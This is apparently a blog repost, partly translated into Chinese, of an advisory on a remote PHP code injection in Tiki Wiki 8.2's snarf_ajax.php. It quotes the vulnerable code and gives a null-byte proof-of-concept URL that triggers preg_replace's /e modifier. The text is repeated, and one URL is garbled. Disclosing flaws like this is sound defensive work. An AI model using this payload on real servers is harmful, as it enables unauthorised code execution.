Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection
Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection
tiki 百科CMS 软件团队 小于等于8.2版本的(snarf_ajxa.php文件)存在远程PHP代码注入
The vulnerable code is located into /lib/wiki-plugins/wikiplugin_snarf.php:
这个漏洞代码在本地的/lib/wiki-plugins/wikiplu_snarf.php文件中的170-173行:
170. // If the user specified a more specialized regex
171. if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) {
172. $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf );
173. }
input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent
execution of arbitrary PHP code using the 'e' modifier in a call to preg_replace() at line 172.
But this check could be bypassed with a null byte injection, requesting an URL like this:
http:///tiki-8.2/snarf_ajax.php?url=1®exres=phpinfo()®ex=//e%00/
Tiki internal filters remove all null bytes from user input, but for some strange reason this
doesn't happen within admin sessions. So, successful exploitation of this vulnerability requires
an user account with administration rights and 'PluginSnarf' to be enabled (not by default).
想成功利用这个漏洞的请求administrator的权限和'PluginSnarf' 的开启。
tiki 百科CMS 软件团队 小于等于8.2版本的(snarf_ajxa.php文件)存在远程PHP代码注入
The vulnerable code is located into /lib/wiki-plugins/wikiplugin_snarf.php:
这个漏洞代码在本地的/lib/wiki-plugins/wikiplu_snarf.php文件中的170-173行:
170. // If the user specified a more specialized regex
171. if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) {
172. $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf );
173. }
input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent
execution of arbitrary PHP code using the 'e' modifier in a call to preg_replace() at line 172.
But this check could be bypassed with a null byte injection, requesting an URL like this:
http://
Tiki internal filters remove all null bytes from user input, but for some strange reason this
doesn't happen within admin sessions. So, successful exploitation of this vulnerability requires
an user account with administration rights and 'PluginSnarf' to be enabled (not by default).
想成功利用这个漏洞的请求administrator的权限和'PluginSnarf' 的开启。
本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/487/
赞(0)
赏
YesCK
继CSDN数据库泄露以后 再次爆出多家国内知名网站数据库
上一篇
2011年12月22日 11:30
False SQL Injection and Advanced Blind SQL Injection[部分翻译]
下一篇
2011年12月23日 11:30
本文 暂无 评论